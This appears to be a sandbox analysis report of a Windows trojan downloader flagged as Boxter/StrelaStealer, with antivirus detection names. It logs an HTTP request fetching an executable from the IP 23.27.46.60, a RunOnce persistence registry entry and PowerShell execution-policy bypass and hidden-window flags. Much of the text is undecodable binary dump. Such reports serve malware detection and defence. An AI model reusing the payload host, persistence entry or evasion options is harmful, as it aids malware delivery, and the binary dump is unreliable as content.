Data received ÅRg<e= 8•lõÛ&éF2Û !Ûâ¿ oJ-^òúüψ.ƒ*ðÝmQ|’9Cc”`=ÇȑÚ‡‹q7î¸e„à´Ê.FùEÖlKõÚ¬¡ZâQbÃR¼Ýï+%ø¾z£°S…p£ó ãÎeX±óC=GȦ›î¦ÎËeSmfTô„©rTTps'Nl>_ž¸©Œs’Óðª9n9}PuÖ!Ñ>ä@4šP{ÊeI¦Ž¬Ú_‹¶+ôÈÆxƒ"f¥I·¨ûF®Ùù&9„¶¡Õ†aÍðý¼ÜT ¸n“i`Iܜ¦ËšÊÝ=Z&j¬ËŒR´&ô» UX9¸àÊ÷JÓ0«}ˆæƒôIÖOÃ"ØjÛzÛu†I ÑKVÅxj.qjH¡Á}Àå0nÂIu~³UL£ÅåñsÉëÖ¦&Ǫ̈¾c~›^¥°¡×ÿâ5ËωGR¶¶ÔƒKZ¯ô“^¤®"„?'S ¶À‹.½Ï©%öî“íY1ÏB@´8 ·¥ó­\º©K±Ö ð· *•±Hg8i£>êW¥y(m”#Â3Ç%?¥½…í.Š„ü“Œ4?ÃÍ<[í†M„„Ø„¡¸¡ Bö!ÈO ß$ƒG ŸW½Æ{ 1ŸyDÿ‹{W=ü ¿™-ϟn÷ V“™WOhŽ$sAÝåªó"h`+­ ÞÏÒ¥¨ù+úhbæêg™õTa! ÿ©Õí0ª·Ø¬龌§¢èBh'´u Z¦%¯ûýPÀïŠÒ ·Þq¥ó±jô”£dàï-–f„½­[oôâ=Ga¸„åž¿N!wÅ¶çÿI®qž¶×,÷ðTåíϖڞq¤§âd6݌æ^ƒ²Ï )"·Øã¾†ë%P1X),L„[Ï+\"¯8»Ð&1? AOŠŽ;ÉYg‡‹½„Ñ€KoñâçÚäj"E‹†PaŒož³y„˜…Kî³n1aü’u¨i4ßWúyÙÅÿº[Íá¡[”%Y¥ÁÌît§ a%ÞMbCS‘Ÿ @•L‘E‡ôz•êõ‹¥þú"FC`.ƒV:¦%ZPGaž#UéÉ [¹æ6cŒ›Mý0®w¾6¿,Vfv€î³ž^6jì'ßT÷žÿ%n®Ë¬T®5½£’~‰½tɃ?"?#"ûíw¥#àÀ¦È°°Äåð+d™ݯ¹Ï÷“㼕 nåqMaÈu扇B^]±ª¸R·O[fD%ø|BTËçSùyê[ÿö]8اeï(fá€Çõ|µ’zRZo.3„Þ‚F̌6¼D+Â|ºw9?êVX$7Õf€YwÊ@cÓ!Aی˔£ 6Ӗ’ßZ¥lk¦(HØ­áÀ aýQÊU‡b^ ˜\Èõ>‘a¸úŠjÌÒ ˆ° ºÐéoùJ÷í³[…iš­,ºi}{5|´ü#hB@tËÁY¨yÕ®“R íf©|{iwÑã½g}@%¸Xß÷ n÷:U7']2àÝ4×øÅ¡¤‚áæ`Ì …×øcúˆJØÄˆÉa«­”‘ØNûþùµa l~©Sÿý <ÉØñºÆrTz}ËÀªw±½êQdcÉu·Ï8úµ„¨›ÖÂRìëLžïéW*ƒ¯ËÂ-%I¢„‚Ž¢ÕO^?ÇêK×hÜBxH·ö9ÕÿÍ¢mtîåUד×;ÒÚ0çoxÍÁª „àNg™T:êå'¤d¦Y‰fÚ‚«#´65ÇA¯‰Ý­{’Ñ€ތ ‘_Œ‹‡À_×¢`ݍiÙ ‡€I÷”Õà|ÔmB0lÜi=cbâÛ\Qɬ/°8Í}:Yk¢ñ² ÎcDJ¤€jÖXR фؕ¿x’è˗7ýd$†â)€» ™ÇâŠDïU–´9M)º¥0B÷98O:g«Øÿùüõ=Ð95%£’gÉ5ñÔ#ìô)Ý8 ®6ìØqÖɒÔi³«E°Kµc%^@æ¾¢!_hšPKÒ¾Xó½ ô´¶3Qf¾«n[¯Ïö¼ø‘–žÐ¨®Ø‹ÞJPGñ‹„^¸¨žÙ¸¶Ù7i=>ǝ„˜ÊvŠ<C*<{>Á‡fT@ϒˆ«qҝȘ'¢G˝?hUÇ6Æþ)ÊðçÿÇÀÐRxèüi~Ãsó¼ã9MM¾›«ДÁJ^fÇ ßõƒ-Hq#®v:šáUŠ9®¥¤ä~,pëiAÉqõÜ Ò°]¥HÜɁÑ…)$)š¼M¾zú ^ÜìF 3d_5Só×£}¤u²Š­š¼ìÿ(TwIéHàq‰ïÐÝ'½Òpt ºu~zGs‰qôéÝ.C‘ÛG=' @Iv ­ü‘Z!ŒVµá±ïWu‡Ï½ØP¶H|B=È9¤ÆK ýï˜ Pz„6 ÷#¼§‹_^ŽðŒIlwÅ5ÿØBŒ\¤'ŸÏ†(¼®Ã–¯´â£0}äÆaۄC:Œ ü7Wu¿òTÄb?¶îÆOø ÜEÀÄ¡Œ¦7nŽ.!Æt›÷öi-é"›’£OØPµÞáŽn-MŒ O·¯rR&!Õýl¤JwèYdP4\Fj%ê๞¢ žž5½ÌqŠ?›±–•±KŒ©‚(ôì bãKVސ;Y££oJyÞÓ¯JMÀ@ÏL ¢3™ÁãӗŽ×êøšÝh• `o¯îäÕV’lI_'õ“²ÔÄJ£=ÖÿNè=»öü585§¹^Àï…ó°ÇÞt͙gª Ë;½Œ¹!3¡5ÃËâC¥<NXDÖ ¸o·ðî^µ¤¥y ¢º¹ ÍErHx Ɩ-M%œc&UÈåM4ñøž—9v‹ó$ù!§ÅȗRIҐW~æ»À*ތc¹§ú€»óÇ]Ñ·\©œU¬vÆa@nçÖ¬7I€–1|3xžgy¬-A+w¯²PÎ"eBú¹lr£ ªÅ*iÝUXϵ¸?âk³lÿJ/NügÒÂ^¥íêwÄbý À6ïÖä>«d;ÿl[äG X ¯ƒE_¬XD¬ÝÇÍߺ˜”#72JÙeÅ eólx¼Ìo“ŽHùv ½õS©(^Þn[âl ‚2¤ð98 šºjLok½E;){öf¹)p`á‚$¬j#9ǽšiìÍÜÃüýOO§6¡/o4Þ'ÿ,¦¾ߊw´yøZ€ìÕÛIÆÁ£!Z1ü`lۖ•G¯ˆK[f¹ñ_Tk`á3ÎK R:xoR^øHAOÃâa%"aJ(Æè¼mlۂѳšgU0<°pB\<g?"-ž{øg<ÞFZ/½ô—lŸF•Zx$¿²(Ÿóót+öWk—߁÷'.í/~·ZZQ}…z€ð«¨–ÌxÄ>&͏c¼+ºL·Î`4öf¸7̶ÃpãEÂ‰Ô¡Ì Ïå#‹[rŒQÕ¿ÿf÷·f>µÆ$ÌàÙå4 iÈ(砀YWñEVn1Žç›áÃ}Õ{é>Éjшš:Oƒ{©öC" º]É©L*(X²ú\Ø0ÌhcèQî ÷ço§GrS“ެ5R2#ðÓ\£íðð<¯ZGB{å+'µLîòÆ:ÍB"*v¶}=³ ˆjܽ§Å-,ä}Y½Ò+Œ®eҀßDS‹ÝöTZÒæbqµàĹb؉®2`¼ÎQ¥ûvsyœ˜/G¸¿T™ß¬Àǯ”}M¬è¼‹ǀõK†Eþ§Z¥0ùs<Ë
Data received b2I鼈 ¶ÚPiArå _±ùs²3Ëx<šù)^Þ´:˜¢8#'¬–é”2kÕ[¸M†c‘l038ž^\x,Ej’Ý‘.ÉëExúÍH\聲/@}tûݼY(!ÕTpš„®?Ú±lª+‘身x0¶ŸÁ£¢àRÍ£5ۘïBý$eýŸyת%°˜ƒò4•mâ¾ö®ô?Ÿ(Ä£’̤'5Cöqz¬‘“&ÔL§|rƒ& fç¹Wá/dšÕl—å¿9ͧ—ðn&heÛ9#cÔÑ_‡Qãn”l®æüiÆÉ:&C‹g2’‡¾ÊÕèRXAùë¿ÝŠRܕ`2ÍI–6ul#H6¬ì:ô_ÚªwfTþÜ14?>> üÕ~äñ2ð÷ƒ£Ô™ó#´J;mÅŠ÷³ŸÿF·PV½EZþŽß»¿éœIä>ôƗC¸àˆ¼Y#€”ò gíí¤ŽÍPïóXzŸA—w~9°¡ úÀÓHW°`n§ê²nàÈaébUðнFêѯ±ˆ³3ê<¬øt{ßÝRå>}iÇ|›ÆÐù³ÕkhätðB:Ùs÷»nË+ا›xGUe¶/ Ðu&&¦ÙstҎ¼ëõZ{ò–s(Cƕñ¦‰™ÑýYmc%–½ÊVh¾b"XÕ)S©8Œ/ò¹#FŒ–.ùˆ9Aüî{pߞ_¾åÿòØM>..Íz()ˆP²ÓŽLÌ Ð«ÉjºÁ¦8䟠ËZ »xɅ€bE¹1¤2l.°Kß8m¼øà8Ÿ_¦`잳ˆhzz“f"gÔ‰MFyMj;µW­Êyã  #ˆÚ l>У!Ù×˳›"öއ‘óí6iBÞ!ysŽŒ=K+¤PÍç6¨;ýêhnˆÍå”×\;ó³à1¨ñáá}êujóuwÞ"±èì1¸õiÞë¹p¨‰ÏAðä×ôš‹EwõÉɵK‰°=蘛a–XWðxP=ä©ë8X ,»°JôÁëû‚]§Ýš œ×”Am8'֙ÀDÅ =)X¼‡1^i‘ÆËÓ¬þ¬D蛬¤3Ì¿âƌÏ+§ ˆl•ó6­>€•Äï×í:$ÍûÕ!Kb„3C~·Ïx¹ˆ4"Š›Ka7ÓªýÊ޲üy fu8ýGê¦AÇù9G f^ÂO4º}57 ÖU„"c=gƒª[¯gÒ„'þl)T„ÖΩXß,¬™]ÿú¨u|MÌMXõ‡€ÚÁ˜?␰dÌ·Ê\gö¼kf}Ì{º`˜Ž, ´ë© É,!× ­å½ÊÒ¬K”d¥fßÞb顿µ›‹ÙÇûâ„$«š‘EtÌ ¹•KÂÉp­ö¬‹[•˜#á3U.µ1b»o^Îä¡Êøÿ´açØ½6fWÞñµ JÃz§©ñ¿cj-?0äA3øúb¹,ÛÌÿÏÌ­ŠÅÞ,â=€eFÄ9,SJ'®m>áÛ·äJА¯_x¡Çµ+’ÐЃ›½“,4F ßtpđLúž£ÌÉo_ÓàÜUl÷{Md:$ÓÐk³^1 €1$ÞÀ8ÀÿšÌù{ÛMX9Ëÿ:µ¬ª‰Ÿ5šy–Á⊮µÆì‘÷§ \å)x¥ÀÑó‚'§3’i+nœªÉÔ-¤Í6DjÒÄþxL+¼AJyÈ5Ÿ^0$@ˆÇ–OÛ6¡#,Hï¢ò¨r%m;ˆ%‹à²àöªýt»ûÕ{;q²7•,úŒäÁ_4œÅ8›6”åiÚN`™ižðèía/ŸÆ |\;'Èá]uÚ'ó5©Sëû.±~…<~i.óL¢ÌTëó§îù…zÂHãò†ÍÃRJž‡)¥\÷ؗc¦g’‡_€ø”D"þèTXÍ0¡¤oúýÏ`ߗ/‰l|„¦q¼¤Ùµ'%TÖÔ']—o1ÜUøÅnÛòQHx|”Õ+¢s߉^wF|m¥h·]Ì0ú¨ç’4ÉځÁùS‹à‚_ Ï¥ßÐ7yEu¸•&Ԗ„¾xqC†”®ß¢‘0Ä]RƺòK}üN¢,HH€›$ Y$ƒ¶Ê~MtŠf`¹}+€ÄÈrÅy~§Öfün.Q難8ݺFP€‹£³Rüì2´}Òۛ«'OàɉyÀæ’Wi·šxè(]©ìÐt4_ KŽ'×aæMŒª{£7}fø¹L…Ù(áè±Ú~…œd’¦)v åYÂÚª^³+µ"²¯%$¼„¢ñ–!Zޏ&ýòL}´clµ›TӍK÷U7&F|êù†¶G%YVÁ€ xNi‹ºF+VéQÀê-ºeÒ@0ÖôŒI`弌öîK….jßìM½Ž•ƒ8Ôòžw±ºþ¼½þóÙ-ŠJ"gƔ ÊÀ½æ´·7š33Y£ Ë^Êü· ÙLÞN)Ú·þBÖ*H‹÷rðOŽê+|‘<Q6Ãü–Œ®»T:Ñ$=^c'·ôp§¶Í%fMDwð͵ja¤ûÁúá¿#Lj!eÍŒ0§ÞÌϓoÛýÔEÍTŸ™]%ÌfM` IéáŒöòS>Yffwõ…Ftm°pòÐ݃ŒÆø!ç N«^D· €s…NRÐt{¶Nåïß@“‚(pÍ,Ü£HÃZ»/µYæjÞ *•=æózàÿ@A•Íe‡†C\¸f2±ɳrÍ]äõóùœ_Ç]m¡v¾Ãf\J‚<Ó!:KºVäGM,’²äï¨OAð1EԊ‚Kf³Â“Çàò‘"òý°Z“~žâjÕJ#0ØàN‰ùàîà)€NI:5 š¨‚°èôgs¤I¬?ÖgÉ´^ ݰ¢È°Eb×i{b$#ÇÓÿ ËXp0ªK4£Ê´˲„›8,‘I¤Ö=i¬£Mƒ4Ä<%(Ðè;) ?ͤÍ|d±žžÊÐÒÕs¢™£e½}«+¬KÊÁF’¸SÂãA'-ô6Mko¾{icXŒ_®g)£èëOÜ Šýñ0Z{øRe•W(¶s»›ö¶oÞ¯!_¢¬û4ÛÍÜòµ²-}Í;¿k]mj"Ù1dÿÀSÉ؝cë ´;ƒÂ њrâýŒB&>ë·~à|+5²âö:Zévŏ juç,ÍߜÉár—1ö°ûgÖ+=+É4ęv{§¯ßî÷v»¤6Çw¸{,®R˜¹RLM§…8ëg[¬ãÉö(µ Gþ‚øw|ö†2) O…vUþ<²nJޖ¸# ˆ³“ð¦ùÌHÎùâØÑÀ!7 3I|4XîJ²Å’pÝz’ÿ:ŔÕ,%ò+/êƒ ç`[âˆ0”¡Å8­Nóڑ6Py¿í£ÐÕFÇcwLí¬ÒótJ?¡ûÜù„d¨v6´JP{nýwãÓ¨¬íýCÁ=ÁŒ é`@ÁÀÿaæ‹tL¸Tä”<1üɎ µèƒÔɈªõô¼þR­AÑ8ü s9¦å¶ŒŠj“>K…V£…ZËT­;üó ü `±»þѱnuõ@¢t]R úìñÒ-YÆÒB_b ¡‡$õP@8­)ã®cø Zfü;žRcIvvÍnƒ!_ðùý5l9~ê™üK‡Ã¬¥\áŽ*%(Ôy>1õwM9ö?ë§r4ì<˜gà7† `Å}ï}½2ÛÍ¾ÆØM9¿Ï-Ë*zPv°º¾·yߘ»ÑÓH寬¨ª “íR”ŽðVÓQܧ½Â‰åM|ºÈ1°rlé¼öºøØã³bã
Data sent GET /a0001/tg01985462.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Host: 23.27.46.60 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 23.27.46.60
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
Time & API Arguments Status Return Repeated

send

buffer: GET /a0001/tg01985462.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Host: 23.27.46.60 Connection: Keep-Alive
socket: 1248
sent: 204
1 204 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:49:24 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Wed, 26 Feb 2025 12:45:21 GMT ETag: "174a00-62f0af24b2372" Accept-Ranges: bytes Content-Length: 1526272 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELa ¿gà hàކ  @  ­8`…†K öÜ€  H.textäf h `.rsrcöÜ Þj@@.reloc €H@BÀ†HTWH6œæø*(*0¸ þ8þ E9d8 |( *} ~€{8:½ÿÿÿ& 8²ÿÿÿ( } ~€{e9’ÿÿÿ& 8‡ÿÿÿ|(+ ~€{69eÿÿÿ& 8Zÿÿÿ0z þ8þ E+,8&( ~€{4:Ïÿÿÿ& 8Äÿÿÿ*(o  ~€{-9£ÿÿÿ& 8˜ÿÿÿ&~þ*~*0/( }}|(+|( *0/( } } | (+| ( *0  þ8þ E 8›($ o%  ~€{,:& 8þ E8ÝW& ~€{[9& 8þ E8s# z ~€{29^ÿÿÿ& 8Sÿÿÿ*%Ch8 &~þ*~*0   þ8þ ER+8Ms ~€{j:Ïÿÿÿ& 8Äÿÿÿ} ~€{O:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() 9s# z*&~þ*~*0ò  þ8þ E8*:; ~€{C:& 8þ E:8s# z o- & ~€{W9Äÿÿÿ& 8¹ÿÿÿ݉ÿÿÿ& ~€{N:& 8þ E8s# z ~€{t:+ÿÿÿ& 8 ÿÿÿ&u›8 &~þ*~*(* *0” þ8þ E.48)~: ~€{>9Ìÿÿÿ& 8Áÿÿÿ~*r­pÐ (. o/ s0 € ~€{h9‰ÿÿÿ& 8~ÿÿÿ~*€*j(#rép~o1 t*&~þ*~*09 }"( }}{ ( +|( *0‚ þ8þ E984(>z*~&o7  ~€{5:Áÿÿÿ& 8¶ÿÿÿ:Ëÿÿÿ ~€{c:›ÿÿÿ& 8ÿÿÿ *.rÿps8 *(* *0_ þ8þ E?8:~(þEs9 s: €& ~€{\:¿ÿÿÿ& 8´ÿÿÿ*&~'þ*~'*0„ þ8þ E.X,8)þ} ~€{y:Æÿÿÿ& 8»ÿÿÿ& 8þ E'8":Õ ~€{‘:& 8þ E “èn}Ö
received: 2920
socket: 1248
1 2920 0
option -ep bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.Win32.Boxter.4!c
CAT-QuickHeal Trojan.Multi
Skyhigh BehavesLike.Win64.Generic.dc
Cylance Unsafe
VIPRE Heur.BZC.MNT.Boxter.928.7DEF2DEE
CrowdStrike win/malicious_confidence_70% (W)
BitDefender Trojan.GenericKD.75922583
Arcabit Trojan.Generic.D4867C97
Symantec Trojan.Gen.MBT
Elastic malicious (high confidence)
ESET-NOD32 a variant of Generik.KWGDLJL
APEX Malicious
Avast Other:Malware-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
MicroWorld-eScan Trojan.GenericKD.75922583
Emsisoft Trojan.GenericKD.75922583 (B)
F-Secure Trojan.TR/AVI.Agent.tdmwq
TrendMicro TrojanSpy.Win64.STRELASTEALER.YXFB1Z
McAfeeD ti!AE577A74A454
CTX exe.trojan.boxter
Sophos Mal/Generic-S
Ikarus BZC.MNT.Boxter
FireEye Trojan.GenericKD.75922583
Google Detected
Avira TR/AVI.Agent.tdmwq
Kingsoft Win32.Troj.Unknown.a
Microsoft Trojan:Win32/Wacatac.B!ml
GData BAT.Malware.InvalidBOM.A
Varist W64/ABRisk.PABB-6286
AhnLab-V3 Trojan/Win.Malware-gen.C5735417
McAfee Artemis!73FF43923990
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.4234042608
Panda Trj/Chgt.AD
TrendMicro-HouseCall TrojanSpy.Win64.STRELASTEALER.YXFB1Z
Tencent Win32.Trojan-Downloader.Agent.Vimw
Fortinet PossibleThreat.MU
AVG Other:Malware-gen [Trj]
Paloalto generic.ml